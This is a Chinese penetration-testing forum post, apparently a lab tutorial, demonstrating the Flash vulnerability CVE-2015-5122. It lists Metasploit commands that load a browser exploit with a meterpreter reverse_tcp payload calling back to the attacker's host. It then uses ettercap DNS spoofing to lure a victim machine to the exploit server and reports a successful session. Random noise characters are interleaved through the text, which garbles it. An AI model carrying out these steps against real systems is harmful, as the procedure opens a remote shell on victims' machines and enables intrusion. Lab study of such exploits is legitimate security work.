中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

% Z0 h9 l9 m- F/ N, c6 { 二、cve2015-5122漏洞实例演示虚拟机 9 K1 o2 Q8 H0 z

; w: \# o9 ]1 }* q0 Z6 Y, F 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 3 n3 ]/ w+ A! {* Z

. N! A' g1 [% z' N search cve-2015-5122如图： ' z6 l* x! e: y/ K4 {4 p0 V

: C" ^$ {2 A2 Q* g/ V 8 Z5 n7 O4 l/ I6 I

8 ~7 A+ J& Q( u2 U3 R 下面我们敲如下命令： ' I- V4 [' I4 k1 j+ @' F1 D6 D

" a+ s( {" m2 f, B! ~# x use exploit/multi/browser/adobe_flash_opaque_background_uaf # }: \+ F0 s" ?- v9 ]- j

: j- i b7 ?5 Z5 G" o3 s set PAYLOAD windows/meterpreter/reverse_tcp 9 y9 v3 M( s5 g, y4 B! I; K

5 | b8 w$ G0 J set LHOST 192.168.0.109 9 t) r) O3 @) o o8 A1 i' t

$ t& g, t% ^% N- c- {$ S set URIPATH / /*根目录*/ 8 L9 O0 b+ z+ ?; R1 @% V9 z

( o- k! K- @3 A5 u: T' e. x3 B% f set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 2 v- c$ F/ o% e- `# G& O

4 U! D$ \( Y' X5 L; D+ _' K set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! `& e; @/ q' L6 b

y* e4 }. n. |* O: z) X 然后show options如图： 0 ?& K1 b$ N& }0 [1 Z

+ [4 _% ~& w. y 7 o& i* d; o1 W! T2 E

3 {) D H1 k# N! \* {* |9 T$ u 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
2 T2 @: H) \- l% j6 d : \7 M, q$ M# {3 X: [$ i

N# s- b& Y& ~3 h# Y+ @, R 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 h# ^, J8 i' m1 K0 q

; s1 h- |1 t! y4 B Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf * S# ~2 V! l4 E

6 w6 x: c5 ^3 k9 | $ Z. y6 i) W R- N* \; H& ~

3 t' ^0 p+ S8 c9 F 成功了，这时候我们断开ettercap，如图： $ o; \# M p r! j/ G. E6 N( }# n; [

( _- n a, V7 U) _& B 8 R1 Z4 Q3 C, M

_% L& i% B' c$ ^7 `( m Screenshot如图： # g3 @4 `! x L

- @1 H* t# m7 m " }5 E- ~7 B+ J" z* ?) D

7 P% |9 c j' P/ O ~ ) ^- S' P& t8 t" Y a

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)